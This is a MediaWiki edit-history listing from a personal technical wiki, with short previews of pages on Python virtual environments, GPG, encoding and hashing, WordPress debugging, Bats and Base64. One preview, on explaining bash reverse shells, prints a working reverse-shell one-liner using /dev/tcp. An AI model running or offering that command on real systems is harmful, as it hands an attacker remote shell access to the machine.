More actions
4 October 2023
- 11:1911:19, 4 October 2023 diff hist +11 How to Setup a Python Virtual Environment No edit summary current
- 11:1811:18, 4 October 2023 diff hist +4,098 N How to Setup a Python Virtual Environment Created page with "<h2>What is a Virtual Environment?</h2> Python, just like any programming language, has modules (aka, extensions, imports, includes, libraries, dependencies). These modules are just pre-written pieces of code, like functions and objects, that you can import into your project and use to extend the functionality and ease of use of the base language. Normally on your own computer you'd install modules globally at a system-wide level. The problem with depending on globally..."
- 11:1311:13, 4 October 2023 diff hist +4,892 N GPG Encryption Created page with "= GPG - GNU Privacy Guard = == Overview == GPG is an alternative implementation of the OpenPGP standard. GPG/PGP uses asymmetric encryption to generate a public / private key pair. With asymmetric encryption, any data encrypted by the public key can only be decrypted by the private key and vice versa. The intention is to make your public key known and freely available while keeping your private k..."
- 11:0911:09, 4 October 2023 diff hist +179 John's Wiki:About No edit summary current
- 11:0511:05, 4 October 2023 diff hist +877 N John's Wiki:About Created page with "In the 1950s, therefore, the leaders of the Soviet Communist Party became thrilled about the new science of cybernetics, which by its nature seemed to translate into a language permeated with an aura of truth, correctness, objectivity – a language therefore perfectly fitting the socialist utopia. Evgeny Zamyatin had described it well in advance in his novel “We” (1920), which – as its translator Alessandro Niero writes – has been "baptised and renamed several..."
- 10:4210:42, 4 October 2023 diff hist +11,319 N Encoding vs Encryption vs Hashing Created page with "Its easy to confuse these concepts as they are often used in conjunction with each other and mean similar things. However, each has a distinct technical meaning whose usage is applicable / not applicable in different contexts. Each method discussed below uses an algorithm to convert data from one format to another. However, these algorithms differ in the details of their functionality and their overall use cases. == Encoding == In a general sense, encoding means to tu..." current
- 10:2910:29, 4 October 2023 diff hist +642 N Debugging Options Created page with "== WordPress Debugging == Edit the site's '''wp-config.php''' file to enable WordPress debugging. define( 'WP_DEBUG', true ); define( 'WP_DEBUG_DISPLAY', false ); define( 'WP_DEBUG_LOG', true ); That will prevent errors from being displayed on the site and instead log them to a '''wp-content/debug.log''' file. == PHP Debugging == === Via .user.ini or php.ini === display_errors = on To log errors to a '''php-debug.log''' file use the following syntax instead...." current
- 09:5809:58, 4 October 2023 diff hist +58 N Change Timezone Created page with " ln -s /usr/share/zoneinfo/America/New_York /etc/localtime" current
- 09:5709:57, 4 October 2023 diff hist +2,655 N Bats - Bash Automated Testing System Created page with "= Bash Automated Testing System = == Overview == Bats is a [https://testanything.org/ TAP-compliant] testing framework for Bash. It provides a simple way to verify that the UNIX programs you write behave as expected. A Bats test file is a Bash script with special syntax for defining test cases. Under the hood, each test case is just a function with a description. <pre>#!/usr/bin/env bats @test "addition using bc" { result="$(echo 2+2 | bc)" [..."
- 09:5009:50, 4 October 2023 diff hist +2,041 N Bash Reverse Shell Explanation Created page with "A typical bash reverse shell payload looks like the following, where 1.1.1.1 is your IP address and 1234 is your netcat listener's port. bash -i >& /dev/tcp/1.1.1.1/1234 0>&1 But what the heck does all that mean? The following is my favorite explaination of how it works. <pre> &> file itself is the same as > file 2>&1, that is open file in write-only mode on file descriptor 1, and duplicate that file descriptor 1 to the file descriptor 2, so that both fd 1 and 2 (s..." current
- 09:4609:46, 4 October 2023 diff hist +1,732 N Base 64 Created page with "== On The Command Line == * To decode messages which are in Base 64 simply copy the content of the message into a text file. For example, lets decode the base 64 listed below. TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCBieSB0aGlz IHNpbmd1bGFyIHBhc3Npb24gZnJvbSBvdGhlciBhbmltYWxzLCB3aGljaCBpcyBhIGx1c3Qgb2Yg dGhlIG1pbmQsIHRoYXQgYnkgYSBwZXJzZXZlcmFuY2Ugb2YgZGVsaWdodCBpbiB0aGUgY29udGlu dWVkIGFuZCBpbmRlZmF0aWdhYmxlIGdlbmVyYXRpb24gb2Yga25vd2xlZGdlLC..." current
- 09:3809:38, 4 October 2023 diff hist +99 Main Page No edit summary
- 09:3309:33, 4 October 2023 diff hist −7 Main Page No edit summary
- 09:3209:32, 4 October 2023 diff hist +28 Main Page No edit summary
- 09:2909:29, 4 October 2023 diff hist −727 Main Page Replaced content with "<strong>John's Wiki</strong>" Tag: Replaced